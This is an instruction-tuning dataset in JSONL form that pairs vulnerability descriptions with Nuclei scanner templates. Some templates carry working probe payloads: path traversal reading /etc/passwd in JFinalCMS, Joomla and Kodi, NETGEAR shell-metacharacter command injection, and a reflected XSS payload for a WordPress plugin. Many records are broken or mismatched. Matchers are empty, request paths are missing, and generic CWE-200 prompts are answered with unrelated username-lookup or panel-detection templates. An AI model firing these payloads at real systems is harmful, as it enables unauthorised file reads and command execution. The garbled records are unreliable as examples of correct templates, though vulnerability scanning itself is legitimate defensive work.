+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: accueil-wampserver\n\ninfo:\n name: Accueil WAMPSERVER Configuration Page - Detect\n author: tess\n severity: medium\n description: Accueil WAMPSERVER configuration page was detected.\n tags: exposure,accueil,wampserver,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Accueil WAMPSERVER\" \n - \"Configuration Serveur\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: CVSweb - Detect", "input": "Title: CVSweb - Detect\nSummary: CVSweb - Detect. CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cvsweb-detect\n\ninfo:\n name: CVSweb - Detect\n author: lu4nx\n severity: info\n description: CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.\n tags: tech,cvsweb,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cvsweb-detect"}
+{"instruction": "Generate a Nuclei template for CVE-2023-41599", "input": "Title: Path Traversal in jfinalcms_project jfinalcms\nSummary: An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: jfinalcms_project jfinalcms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-41599\n\ninfo:\n name: JFinalCMS v5.0.0 - Directory Traversal\n author: pussycat0x\n severity: medium\n description: An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.\n tags: cve,cve2023,jrecms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-41599"}
+{"instruction": "Generate a Nuclei template for CVE-2021-38156", "input": "Title: Cross-Site Scripting (XSS) in nagios nagios_xi\nSummary: In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: nagios nagios_xi\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-38156\n\ninfo:\n name: Nagios XI < 5.8.6 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.\n tags: cve,cve2021,nagios,nagiosxi,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"data-title=\"\">\" \n part: body_5\n - type: word\n words:\n - \"text/html\" \n part: header_5\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-38156"}
+{"instruction": "Generate a Nuclei template for: Vercel Source Code Exposure", "input": "Title: Vercel Source Code Exposure\nSummary: Vercel Source Code Exposure. The Vercel Source Code Exposure misconfiguration allows an attacker to access sensitive source code files on the Vercel platform.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: vercel-source-exposure\n\ninfo:\n name: Vercel Source Code Exposure\n author: hlop\n severity: medium\n description: The Vercel Source Code Exposure misconfiguration allows an attacker to access sensitive source code files on the Vercel platform.\n tags: vercel,exposure,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_src\" \n matchers:\n - type: word\n words:\n - \"Deployment Source\" \n - \"Deployment Source \u2013 Dashboard \u2013 Vercel\" \n part: body\n condition: or\n - type: word\n words:\n - \"Login \u2013 Vercel\" \n part: body", "category": "generic", "severity": "medium", "id": "vercel-source-exposure"}
+{"instruction": "Generate a Nuclei template for: ccleaner phishing Detection", "input": "Title: ccleaner phishing Detection\nSummary: ccleaner phishing Detection. A ccleaner phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ccleaner-phish\n\ninfo:\n name: ccleaner phishing Detection\n author: rxerium\n severity: info\n description: A ccleaner phishing website was detected\n tags: phishing,ccleaner,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"CCleaner Makes Your Computer Faster & More Secure | Official Website\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "ccleaner-phish"}
+{"instruction": "Generate a Nuclei template for: SAP Dispatcher - Detect", "input": "Title: SAP Dispatcher - Detect\nSummary: SAP Dispatcher - Detect. The SAP Dispatcher is the central process that manages communication between user requests and work processes.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sap-dispatcher-detect\n\ninfo:\n name: SAP Dispatcher - Detect\n author: pussycat0x\n severity: info\n description: The SAP Dispatcher is the central process that manages communication between user requests and work processes.\n tags: network,tcp,sap,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sap-dispatcher-detect"}
+{"instruction": "Generate a Nuclei template for CVE-2023-23491", "input": "Title: Cross-Site Scripting (XSS) in fullworksplugins quick_event_manager\nSummary: The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: fullworksplugins quick_event_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-23491\n\ninfo:\n name: Quick Event Manager < 9.7.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-23491"}
+{"instruction": "Generate a Nuclei template for: FullHunt API Test", "input": "Title: FullHunt API Test\nSummary: FullHunt API Test. FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-fullhunt\n\ninfo:\n name: FullHunt API Test\n author: 0ri2N\n severity: info\n description: FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet.\n tags: scan,recon,fullhunt,token-spray\n\nhttp:\n - method: GET\n path:\n - \"https://fullhunt.io/api/v1/domain/interact.sh/details\" \n matchers:\n - type: word\n words:\n - \"\"dns\"\" \n - \"\"hosts\"\" \n - \"\"domain\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-fullhunt"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Google APIs Blogger", "input": "Title: Content-Security-Policy Bypass - Google APIs Blogger\nSummary: Content-Security-Policy Bypass - Google APIs Blogger\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: googleapis-blogger-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Google APIs Blogger\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Google APIs Blogger\n tags: xss,csp-bypass,googleapis-blogger,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"googleapis.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "googleapis-blogger-csp-bypass"}
+{"instruction": "Generate a Nuclei template for: DeviantArt API Test", "input": "Title: DeviantArt API Test\nSummary: DeviantArt API Test. Tags: token-spray, deviantart\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-deviantart\n\ninfo:\n name: DeviantArt API Test\n author: zzeitlin\n severity: info\n description: DeviantArt API Test\n tags: token-spray,deviantart\n\nhttp:\n - method: POST\n path:\n - \"https://www.deviantart.com/api/v1/oauth2/placebo\" \n matchers:\n - type: word\n words:\n - \"\"status\" : \"success\"\" \n part: body", "category": "generic", "severity": "info", "id": "api-deviantart"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: stonerssocial-mastodon-instance\n\ninfo:\n name: Stoners.social (Mastodon Instance) User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Stoners.social (Mastodon Instance) user name information check was conducted.\n tags: osint,osint-social,stonerssocial-mastodon-instance,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://stoners.social/api/v1/accounts/lookup?acct={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"display_name\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2020-13945", "input": "Title: Unknown Vulnerability in apache apisix\nSummary: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: apache apisix\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-13945\n\ninfo:\n name: Apache APISIX - Insufficiently Protected Credentials\n author: pdteam\n severity: medium\n description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.\n tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"action\":\"create\"\" \n - \"\"script\":\" \n - \"\"node\":\" \n condition: and\n - type: status\n status:\n - 201", "category": "cve", "severity": "medium", "id": "CVE-2020-13945"}
+{"instruction": "Generate a Nuclei template for: tcsh - Privilege Escalation", "input": "Title: tcsh - Privilege Escalation\nSummary: tcsh - Privilege Escalation. tcsh is a Unix shell based on and compatible with the C shell (csh). It provides a command-line interface for interacting with the operating system and executing commands.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-tcsh\n\ninfo:\n name: tcsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: tcsh is a Unix shell based on and compatible with the C shell (csh). It provides a command-line interface for interacting with the operating system and executing commands.\n tags: code,linux,tcsh,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-tcsh"}
+{"instruction": "Generate a Nuclei template for: GitHub Refresh Token", "input": "Title: GitHub Refresh Token\nSummary: GitHub Refresh Token. Tags: github, refresh, token\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: github-refresh\n\ninfo:\n name: GitHub Refresh Token\n author: DhiyaneshDK\n severity: info\n description: GitHub Refresh Token\n tags: github,refresh,token,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "github-refresh"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: remedy-axis-login\n\ninfo:\n name: Remedy Axis Login Panel - Detect\n author: tess\n severity: info\n description: Remedy Axis Login Panel - Detect\n tags: panel,remedy,bmc,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/arsys/shared/login.jsp\" \n - \"{{BaseURL}}/rsso/admin/\" \n matchers:\n - type: word\n words:\n - \"BMC Remedy Mid Tier \" \n - \"Remedy Login Page\" \n - \"BMC Remedy\" \n - \"BMC Smart Reporting\" \n part: body\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2016-6277", "input": "Title: Cross-Site Request Forgery (CSRF) in netgear d6220_firmware and others\nSummary: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.\nVulnerability Type: Cross-Site Request Forgery (CSRF)\nSeverity: high\nAffected Products: netgear d6220_firmware, netgear d6400_firmware, netgear r6250_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-6277\n\ninfo:\n name: NETGEAR Routers - Remote Code Execution\n author: pikpikcu\n severity: high\n description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.\n tags: cve2016,cve,netgear,rce,iot,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2016-6277"}
+{"instruction": "Generate a Nuclei template for CVE-2014-9180", "input": "Title: Unknown Vulnerability in eleanor-cms eleanor_cms\nSummary: Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: eleanor-cms eleanor_cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-9180\n\ninfo:\n name: Eleanor CMS - Open Redirect\n author: Shankar Acharya\n severity: medium\n description: Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/go.php?http://interact.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2014-9180"}
+{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - jsDelivr", "input": "Title: Content-Security-Policy Bypass - jsDelivr\nSummary: Content-Security-Policy Bypass - jsDelivr. Tags: xss, csp-bypass, jsdelivr\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: jsdelivr-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - jsDelivr\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - jsDelivr\n tags: xss,csp-bypass,jsdelivr,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"jsdelivr.net\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "jsdelivr-csp-bypass"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cohost\n\ninfo:\n name: Cohost User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Cohost user name information check was conducted.\n tags: osint,osint-social,cohost,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://cohost.org/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"cohost! - @\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: AJ-Report Open Source Data Screen - Remote Code Execution", "input": "Title: AJ-Report Open Source Data Screen - Remote Code Execution\nSummary: AJ-Report Open Source Data Screen - Remote Code Execution. AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: CNVD-2024-15077\n\ninfo:\n name: AJ-Report Open Source Data Screen - Remote Code Execution\n author: pussycat0x\n severity: high\n description: AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.\n tags: cnvd,cnvd2024,aj-report,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"code\" \n - \"data\" \n part: body\n condition: and\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "CNVD-2024-15077"}
+{"instruction": "Generate a Nuclei template for CVE-2010-5286", "input": "Title: Path Traversal in joobi com_jstore\nSummary: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: joobi com_jstore\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-5286\n\ninfo:\n name: Joomla! Component Jstore - 'Controller' Local File Inclusion\n author: daffainfo\n severity: critical\n description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-5286"}
+{"instruction": "Generate a Nuclei template for CVE-2025-26319", "input": "Title: Unrestricted File Upload in flowiseai flowise\nSummary: FlowiseAI Flowise v2.2.6 was discovered to contain an arbitrary file upload vulnerability in /api/v1/attachments.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: flowiseai flowise\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-26319\n\ninfo:\n name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.\n tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"name\":\" \n - \"mimeType\":\"text/plain\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"apiKey\":\"\" \n - \"apiSecret\":\" \n - \"chatFlows\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2025-26319"}
+{"instruction": "Generate a Nuclei template for: IBM Security Verify Access Login - Panel", "input": "Title: IBM Security Verify Access Login - Panel\nSummary: IBM Security Verify Access Login - Panel. IBM Security Verify Access login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ibm-security-verify-panel\n\ninfo:\n name: IBM Security Verify Access Login - Panel\n author: johnk3r\n severity: info\n description: IBM Security Verify Access login panel was detected.\n tags: panel,ibm,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"IBM Security Verify Access\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ibm-security-verify-panel"}
+{"instruction": "Generate a Nuclei template for CVE-2024-36527", "input": "Title: Path Traversal in CVE-2024-36527\nSummary: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\nVulnerability Type: Path Traversal\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-36527\n\ninfo:\n name: Puppeteer Renderer - Directory Traversal\n author: Stux\n severity: medium\n description: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n tags: cve,cve2024,puppeteer-renderer,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html?url=file:///etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-36527"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: alternc-panel\n\ninfo:\n name: AlternC Desktop Panel - Detect\n author: Splint3r7\n severity: info\n description: AlternC Desktop panel was detected.\n tags: panel,alternc,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2024-11740", "input": "Title: Code Injection in w3eden download_manager\nSummary: The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\nVulnerability Type: Code Injection\nSeverity: high\nAffected Products: w3eden download_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11740\n\ninfo:\n name: Download Manager < 3.3.04 - Unauthenticated Arbitrary Shortcode Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n tags: cve,cve2024,wordpress,wp-plugin,download-manager,short-code,wp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"wpdm-all-packages\"\" \n - \"wpdm-download-link download-on-click\" \n part: body\n condition: and\n - type: word\n words:\n - \"No Packages Found\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2024-11740"}
+{"instruction": "Generate a Nuclei template for: phpwind Installer Exposure", "input": "Title: phpwind Installer Exposure\nSummary: phpwind Installer Exposure. phpwind is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: phpwind-installer\n\ninfo:\n name: phpwind Installer Exposure\n author: tess\n severity: high\n description: phpwind is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,phpwind,exposure,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install.php?a=check\" \n matchers:\n - type: word\n words:\n - \"Powered by phpwind\" \n - \"\u5b89\u88c5\" \n part: body\n condition: and\n - type: word\n words:\n - \"You have installed. To reinstall, you need to clear the data/install.lock file\" \n - \"\u60a8\u5df2\u7ecf\u5b89\u88c5\u8fc7\uff0c\u9700\u8981\u91cd\u65b0\u5b89\u88c5\u8bf7\u5148\u5220\u9664data/install.lock\u6587\u4ef6\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "phpwind-installer"}
+{"instruction": "Generate a Nuclei template for CVE-2017-5982", "input": "Title: Path Traversal in kodi kodi\nSummary: Directory traversal vulnerability in the Chorus2 2.4.2 add-on for Kodi allows remote attackers to read arbitrary files via a %2E%2E%252e (encoded dot dot slash) in the image path, as demonstrated by image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: kodi kodi\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-5982\n\ninfo:\n name: Kodi 17.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n tags: cve2017,cve,kodi,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2017-5982"}
+{"instruction": "Generate a Nuclei template for CVE-2025-61882", "input": "Title: Authentication Bypass in oracle concurrent_processing\nSummary: Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: oracle concurrent_processing\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-61882\n\ninfo:\n name: Oracle E-Business Suite 12.2.3\u201312.2.14 \u2013 Remote Code Execution\n author: DhiyaneshDk,watchtowr\n severity: critical\n description: Oracle Concurrent Processing 12.2.3-12.2.14 contains a remote code execution caused by unauthenticated network access via HTTP, letting unauthenticated attackers fully compromise the system, exploit requires network access via HTTP.\n tags: cve,cve2025,oracle,ebusiness,lfi,rce,ssrf,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-61882"}
+{"instruction": "Generate a Nuclei template for CVE-2024-5975", "input": "Title: SQL Injection in contrive cz_loan_management\nSummary: The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: contrive cz_loan_management\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-5975\n\ninfo:\n name: CZ Loan Management <= 1.1 - SQL Injection\n author: s4e-io\n severity: critical\n description: The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,wp,cz-loan-management,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-5975"}
